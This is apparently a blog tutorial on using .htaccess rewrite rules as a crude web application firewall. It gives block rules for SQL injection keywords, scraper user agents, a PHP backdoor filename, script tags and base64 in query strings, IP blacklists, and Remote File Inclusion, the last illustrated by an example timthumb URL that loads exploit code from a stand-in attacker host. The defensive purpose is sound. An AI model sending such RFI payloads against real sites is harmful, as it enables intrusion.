7 Tips: .htaccess as Web Application Firewall (WAF) to secure your website

How to use .htaccess as a Web Application Firewall (WAF), and block out exploits and rogue HTTP requests. Sometimes you have no choice but to protect your website yourself, for example if your hosting provider doesn’t offer a Web Application Firewall (WAF) [2] security solution.

Learn how to secure your website using .htaccess files – 7 .htaccess security examples

What .htaccess rules can you use to protect your website from online threats?

Be careful though, web application security firm Acunetix warns against using .htaccess for security restrictions.

You can use .htaccess on Windows Server and IIS with Helicon Ape. It is pretty easy to set up and configure your .htaccess file as a sort of web application firewall. When used properly, this is one way to protect your website from known and unknown exploits or threats.

A Web Application Firewall (WAF)

A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as cross-site scripting (XSS) ([2]) and SQL injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.

Helicon Ape can be used, in a way, to prevent basic SQL injection attacks too. There is a small downside though: the .htaccess file needs to be read for HTTP requests, even though it’ll be cached for some time, this might cost some performance.

Using the .htaccess rewrite rules below, you can protect your website somewhat from online threats. An important fact is that you know your own website; you need to know what requests you can expect -and are valid- and which requests need to be blocked.

Some simple examples:

Magento app/etc/local.xml security

Protect Magento’s app/etc/local.xml file containing MySQL database credentials.

# Secure Magento's local.xml file which contains MySQL database credentials
# See http://www.saotn.org/magento-appetclocal-xml-beveiliging/
# 
RewriteEngine On
RewriteCond %{REQUEST_URI} app/etc/local.xml$ [NC]
RewriteRule .? - [F,L]

Protect against known SQL injection attacks through HTTP GET

# protect your website from some known SQL Injectie attacks:
RewriteEngine On
# continue with SQL functions
# works only on HTTP GET, *not* POST body
RewriteCond %{THE_REQUEST} (?:limit|union|select|concat|1==1|like|drop|#|--) [NC]
RewriteRule .? - [F,L]

Block spam bots in a .htaccess file

# block spambots (unverified!)
RewriteEngine On
RewriteCond %{HTTP:User-Agent}
(?:Alexibot|Art-Online|asterias|BackDoorbot|Black.Hole|
BlackWidow|BlowFish|botALot|BuiltbotTough|Bullseye|BunnySlippers|Cegbfeieh|Cheesebot|CherryPicker|ChinaClaw|CopyRightCheck|cosmos|Crescent|Custo|DISCo|DittoSpyder|DownloadsDemon|eCatch|EirGrabber|EmailCollector|EmailSiphon|EmailWolf|EroCrawler|ExpresssWebPictures|ExtractorPro|EyeNetIE|FlashGet|Foobot|FrontPage|GetRight|GetWeb!|Go-Ahead-Got-It|Go!Zilla|GrabNet|Grafula|Harvest|hloader|HMView|httplib|HTTrack|humanlinks|ImagesStripper|ImagesSucker|IndysLibrary|InfonaviRobot|InterGET|InternetsNinja|Jennybot|JetCar|JOCsWebsSpider|Kenjin.Spider|Keyword.Density|larbin|LeechFTP|Lexibot|libWeb/clsHTTP|LinkextractorPro|LinkScan/8.1a.Unix|LinkWalker|lwp-trivial|MasssDownloader|Mata.Hari|Microsoft.URL|MIDownstool|MIIxpc|Mister.PiX|MistersPiX|moget|Mozilla/3.Mozilla/2.01|Mozilla.*NEWT|Navroad|NearSite|NetAnts|NetMechanic|NetSpider|NetsVampire|NetZIP|NICErsPRO|NPbot|Octopus|Offline.Explorer|OfflinesExplorer|OfflinesNavigator|Openfind|Pagerabber|PapasFoto|pavuk|pcBrowser|ProgramsSharewares1|ProPowerbot/2.14|ProWebWalker|ProWebWalker|psbot/0.1|QueryN.Metasearch|ReGet|RepoMonkey|RMA|SiteSnagger|SlySearch|SmartDownload|Spankbot|spanner|Superbot|SuperHTTP|Surfbot|suzuran|Szukacz/1.4|tAkeOut|Teleport|TeleportsPro|Telesoft|The.Intraformant|TheNomad|TightTwatbot|Titan|toCrawl/UrlDispatcher|toCrawl/UrlDispatcher|True_Robot|turingos|Turnitinbot/1.5|URLy.Warning|VCI|VoidEYE|WebAuto|WebBandit|WebCopier|WebEMailExtrac.*|WebEnhancer|WebFetch|WebGosIS|Web.Image.Collector|WebsImagesCollector|WebLeacher|WebmasterWorldForumbot|WebReaper|WebSauger|WebsiteseXtractor|Website.Quester|WebsitesQuester|Webster.Pro|WebStripper|WebsSucker|WebWhacker|WebZip|Wget|Widow|[Ww]eb[Bb]andit|WWW-Collector-E|WWWOFFLE|XaldonsWebSpider|Xenu's|Zeus) [NC]
RewriteRule .? - [F]

Deny access to known PHP backdoors like l_backuptoster.php

# Deny access to l_backuptoster.php / l_backuptoster_backup.php (PHP backdoor)
RewriteEngine On
RewriteCond %{REQUEST_URI} (^/l_backuptoster.php) [NC]
# or to match any location
# RewriteCond %{REQUEST_URI} (l_backuptoster.php) [NC]
# or expanded
# RewriteCond %{REQUEST_URI} l_backuptoster(_backup)?.php [NC]
RewriteRule .? - [F,L]

Joomla! Search Engine Friendly (SEF) .htaccess

# From the standard Joomla! .htaccess file, as reference
# 
# Block out any script trying to base64_encode data within the URL.
RewriteCond %{QUERY_STRING} base64_encode[^(]*([^)]*) [OR]
# Block out any script that includes a <script> tag in URL.
RewriteCond %{QUERY_STRING} (< |%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL.
RewriteCond %{QUERY_STRING} GLOBALS(=|[|%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL.
RewriteCond %{QUERY_STRING} _REQUEST(=|[|%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]

The flag F means “Forbidden” and L is “Last” (stop rewriting this request).

Interesting:   Target multiple ASP.NET versions with AppCmd.exe

.htaccess RewriteMap as blacklist

With a RewriteMap, .htaccess files are very well usable to block IP addresses of known abusers:

Create a text file called “blacklist.txt” and place the IP addresses you want to block in that file. Because a RewriteMap uses a key1 / value1 structure, you have to add a key/value line: for example 203.0.113.15 -. The IP address 203.0.113.15 is they key, and – the value.

Put your blacklist.txt file outside the web root preferably, and include the file in your .htaccess file as a RewriteMap:

RewriteMap blacklist txt:D:/path/to/your/blacklist.txt [NC]
RewriteCond %{REMOTE_ADDR} (.*)
RewriteCond ${blacklist:%1|NOT_FOUND} !NOT_FOUND
RewriteRule .? - [F,L]

Line by line explanation

  1. you declare a map file ‘blacklist’, called ‘blacklist.txt’
  2. the REMOTE_ADDR (the visitors IP address) is the look up key
  3. the value of our REMOTE_ADDR key is looked up in the blacklist.txt map
  4. if the value is found, the RewriteRule is executed

Reference http://helicontech.blogspot.com/2009/02/isapirewrite-faq.html.

A ready to use PHP blacklist web application is found here:
Filter web traffic with blacklists. Always verify with your host whether .htaccess files are supported.

Block out known, and unknown 0-day, Remote File Inclusion exploits

If your hosting provider offers support for .htaccess files and you are on top of new vulnerabilities in web software, you can make use of the rewriting capability of .htaccess. Whether you use .htaccess with Apache mod_rewrite, or .htaccess in IIS with Helicon Ape on Windows Server. Use the rewrite engine, for instance, to block out known, and even unknown vulnerabilities in the software you use.

You can block out new and known – or even yet unknown 0-day – exploits either by matching a QUERY_STRING, REQUEST_URI or REQUEST_FILENAME. In the above part, I showed you how to protect your website from known exploits.

Interesting:   How to install IIS URL Rewrite Module on Windows Server 2016 & IIS 10

What now follows is a practical tip to block Remote File Inclusion (RFI) Cross Site Scripting (or XSS) attacks. Simply by blocking all requests to external HTTP addresses and websites.

Use .htaccess rule to block requests to remote URL’s & secure your website

Lots of vulnerabilities in scripts are exploited by requesting remote files and content. This is called Remote File Inclusion: the output of remote scripts is executed within the context of the vulnerable script and server. A notorious example is Timthumb. Timthumb is used in many WordPress themes and plugins.

If you know what to look for, you can easily block those requests to remote files with a .htaccess file. For example, if a remote domain name is provided as URL parameter. The following example looks at the ?src= query string parameter and blocks the request if it doesn’t match our own domain name.

RewriteEngine On
RewriteCond %{QUERY_STRING} (src=) [NC]
RewriteCond %{QUERY_STRING} ((http(s)?)://)? [NC]
RewriteCond %{QUERY_STRING} !((.+\.)?(example\.com)) [NC]
RewriteRule .? / [F,L]

Replace example.com with your own domain name. You need to escape the dot (“.“) in the expression with a back slash \.

The .htaccess rule explained
The above .htaccess rules looks at three query string parameters and then decides to block the request with a Forbidden flag if all conditions are met.

  1. if src= is provided in the query string
  2. and optional HTTP or HTTPS as protocol
  3. if it doesn’t contain your own domain name example.com
  4. then refuse the request

For example, a HTTP request with query string parameter ?src= and value http://evil_hacker_site.com:

http://localhost/wp-content/themes/thema/timthumb.php?src=http://evil_hacker_site.com/exploit.php

Is blocked with a 403 Forbidden HTTP status code.

RewriteCond matching in .htaccess
The above RewriteCond condition (or rule) matches random positions in the query string. Keep that in mind. The following URL is matched too:

http://localhost/wp-content/themes/thema/timthumb.php
  ?foo=http://&src=123&bar=example.com

Also, try to combine as much in one rule as possible:

RewriteEngine On
RewriteCond %{QUERY_STRING} src=(http(s)?://)?(?!((.+\\.)?example\\.com)) [NC]
RewriteRule .? / [F,L]

0 replies

Leave a Reply

Want to join the discussion?
Feel free to contribute!

Leave a Reply

Your email address will not be published.